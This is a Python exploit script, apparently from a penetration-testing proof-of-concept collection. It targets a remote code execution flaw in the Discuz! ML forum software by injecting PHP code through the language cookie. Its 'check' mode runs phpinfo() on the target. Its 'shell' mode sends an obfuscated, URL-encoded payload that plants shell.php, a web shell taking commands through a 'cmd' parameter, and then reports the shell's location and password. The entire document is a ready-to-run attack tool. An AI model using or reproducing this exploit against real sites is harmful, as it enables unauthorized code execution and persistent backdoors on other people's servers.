mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 09:50:19 +00:00
71 lines
3.2 KiB
Python
71 lines
3.2 KiB
Python
|
#!/usr/bin/python
|
|||
|
|
# coding=utf-8
|
|||
|
|
|
|||
|
|
import requests
|
|||
|
|
import re
|
|||
|
|
from argparse import ArgumentParser
|
|||
|
|
|
|||
|
|
|
|||
|
|
class Dz_Ml_RCE:
|
|||
|
|
def __init__(self):
|
|||
|
|
self.headers = {
|
|||
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
|
|||
|
|
'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;'
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
def check(self):
|
|||
|
|
'''漏洞检测'''
|
|||
|
|
self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'")
|
|||
|
|
r = requests.get(url=result.url, headers=self.headers)
|
|||
|
|
if re.search(r'<title>phpinfo\(\)</title>', r.text):
|
|||
|
|
print("[*]Target Is Seem To Be Vulnerable!")
|
|||
|
|
else:
|
|||
|
|
print("[!]Target Is Not Seem To Be Vulnerable!")
|
|||
|
|
|
|||
|
|
def getshell(self):
|
|||
|
|
shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27'
|
|||
|
|
self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload)
|
|||
|
|
r = requests.get(url=result.url, headers=self.headers)
|
|||
|
|
if re.search(r'<title>Forum - Powered by Discuz!</title>', r.text):
|
|||
|
|
print("[*]Shell Create Successfully!")
|
|||
|
|
print(f"[+]shell:在 {result.url} 同目录下的shell.php 密码:cmd")
|
|||
|
|
else:
|
|||
|
|
print("[!]Shell Create Failed!")
|
|||
|
|
|
|||
|
|
def run(self):
|
|||
|
|
if result.func == 'check':
|
|||
|
|
self.check()
|
|||
|
|
elif result.func == 'shell':
|
|||
|
|
self.getshell()
|
|||
|
|
else:
|
|||
|
|
print("[!]请选择正确的功能:check(漏洞检测)/shell(直接getshell)!")
|
|||
|
|
|
|||
|
|
|
|||
|
|
def main():
|
|||
|
|
if not result.func:
|
|||
|
|
print("[!]请先使用-f指定可选的功能:check(漏洞检测)/getshell(直接getshell)")
|
|||
|
|
return
|
|||
|
|
else:
|
|||
|
|
Dz_Ml_RCE().run()
|
|||
|
|
|
|||
|
|
|
|||
|
|
if __name__ == '__main__':
|
|||
|
|
show = '''
|
|||
|
|
_____ _ __ __ _ _____ _____ ______
|
|||
|
|
| __ \ | | | \/ | | | __ \ / ____| ____|
|
|||
|
|
| | | |___| | | \ / | | | |__) | | | |__
|
|||
|
|
| | | |_ / | | |\/| | | | _ /| | | __|
|
|||
|
|
| |__| |/ /|_| | | | | |____ | | \ \| |____| |____
|
|||
|
|
|_____//___(_) |_| |_|______| |_| \_\\_____|______|
|
|||
|
|
______
|
|||
|
|
|______|
|
|||
|
|
|
|||
|
|
By PANDA墨森
|
|||
|
|
'''
|
|||
|
|
print(show + '\n'*2)
|
|||
|
|
arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森')
|
|||
|
|
arg.add_argument('url', help='目标url,eag:http://www.xxx.com/discuz/upload/forum.php')
|
|||
|
|
arg.add_argument('-f', '--func', help='可选的功能:check(漏洞检测)/shell(直接getshell)', dest='func', type=str)
|
|||
|
|
result = arg.parse_args()
|
|||
|
|
main()
|